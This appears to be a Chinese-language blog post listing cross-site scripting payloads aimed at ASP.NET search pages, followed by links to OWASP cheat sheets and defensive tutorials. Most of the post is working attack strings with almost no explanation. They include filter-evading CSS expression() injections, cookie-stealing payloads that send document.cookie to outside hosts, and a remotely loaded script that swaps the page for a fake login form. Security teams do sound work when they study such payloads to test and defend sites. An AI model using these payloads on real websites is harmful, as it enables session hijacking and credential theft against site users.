Asp.net跨站脚本攻击XSS实例分享

常用攻击代码：

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> 
Redirection Attack 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")> 
Cookie stealing 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(window.location= 
"http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)> 
Unrestricted HTML injection from external '.js' file 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild 
(document.createElement("script")))> 

</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))> 
where 'xss.js' could contain a snippet that overwrites the entire document's HTML body. i.e.: 
document.body.innerHTML = '<b>since we can now insert brakets without having to escape the request filtering, we\'re free to insert any HTML tags</b></br><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"></br><input type="submit" value="Log in"></form>'; 
<object><param name="src" value=
"javascript:alert(0)"></param></object>
<object data="javascript:alert(0)">
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image
<x:script xmlns:x="http://www.w3.org/1999/
xhtml">alert('xss');</x:script>
location='javascript:alert(0)';
location=name;
http://site.com/?p=";eval(unescape(location))//#
%0Aalert(0)
<b/alt="1"onmouseover=InputBox+1
language=vbs>test</b>
</a onmousemove="alert(1)">
<a onmousemove="alert(1)">test</a>
<html><title>{alert('xss')}</title></html>
";document.write('<img src=http://p42.us/
x.png?'%2bdocument.cookie%2b'>');"
";document.write('<img sr'%2b'c=http://p42.us/
x.png?'%2bdocument['cookie']%2b'>');"
<b "<script>alert(1)</script>">hola</b>
等等

XSS脚本列表：

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

防御XSS列表：

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

部分实例分享：

http://www.codeproject.com/Articles/573458/An-Absolute-Beginners-Tutorial-on-Cross-Site-Scrip
http://www.codeproject.com/Articles/617043/Hack-Proof-Your-ASP-NET-Application-From-Cross-Sit
http://software-security.sans.org/developer-how-to/developer-guide-xss
http://blogs.msdn.com/b/cisg/archive/2008/09/10/real-world-xss-vulnerabilities-in-asp-net-code.aspx
http://weblogs.asp.net/jongalloway/preventing-javascript-encoding-xss-attacks-in-asp-net-mvc
http://www.softwaresecured.com/2013/03/04/asp-net-security-code-review-techniques-cross-site-scripting-edition/
https://github.com/TelerikAcademy/ASP.NET-MVC/tree/master/04.%20ASP.NET%20Web%20Security

其他实例：

http://www.securitysift.com/xss-and-cross-site-scripting-with-a-little-help-from-asp-net-and-ie9/